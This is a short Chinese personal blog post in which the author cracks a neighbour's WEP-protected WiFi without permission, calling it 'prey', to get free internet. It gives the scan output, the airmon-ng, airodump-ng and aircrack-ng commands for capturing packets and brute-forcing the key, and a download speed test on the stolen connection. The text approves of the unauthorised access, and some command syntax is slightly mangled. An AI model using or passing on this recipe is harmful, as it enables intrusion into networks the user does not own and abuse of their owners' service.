家里没有网络。但是扫描了一下 WIFI,嘿嘿,发现猎物咯!WEP 加密,信号强度还这么好的一个 WIFI AP。虽然早就知道 WEP 这个东西有还不如没有,容易破解的很,但是很少有机会破人家的信号,因为自己有 3G 上网卡啊。但是被别人借走罢了。自动动手破解吧,我的网卡是 EeePC 的 RaLink RT2860。
$ iwlist wlan0 scanwlan0 Scan completed :Cell 01 – Address: 00:25:86:XX:XX:XXProtocol:802.11b/gESSID:”FAST_XXXXXX”Mode:ManagedChannel:6Quality:91/100 Signal level:-54 dBm Noise level:-81 dBmEncryption key:onBit Rates:36 Mb/s
OK,开始吧。虽然网上很多教程里开头就让你改 MAC 地址,我感觉没什么用,反正都用 WEP 加密了,,还希望他能把你抓出来?
首先打开网卡的监听模式(又称为混杂模式),这里我的网卡编号为 wlan0,目标的 WIFI AP 位于 channel 6,那么则为
$ sudo airmon-ng wlan0 6 这个时候就应该看到提示说,monitor mode enabled,继续抓包就行
$ sudo airodump-ng -w a.cap –channel 6 wlan0 这样会把抓到的所有数据包放在 a.cap 中。更悲剧的是,我的无线网卡不知道因为驱动原因还是内核原因,都无法使用 injection,所以…无法攻击 AP 使其返回足够算出密码的数据包。那么只好慢慢的抓了,这里我抓了一个上午,搞到了 20K 个包,理论上来说完全足够了已经。下面就是要算出来 KEY 啦
$ sudo aircrack-ng -x a.cap 这里我加入了 -x 参数,让破解时候使用暴力穷举的方法。不出1分钟,密码就被算出来了,如图
使用算出来的密码连接上去,很给力喔,连接 anyLinux 下载文件测试,速度能有多快?达到了 839K/s 的速度,比在学校给力
2010-09-23 14:02:44 (836 KB/s) – `file’ saved [104857600/104857600]
躲在墙角、掩藏那孤独而又不奢怜悯的伤…
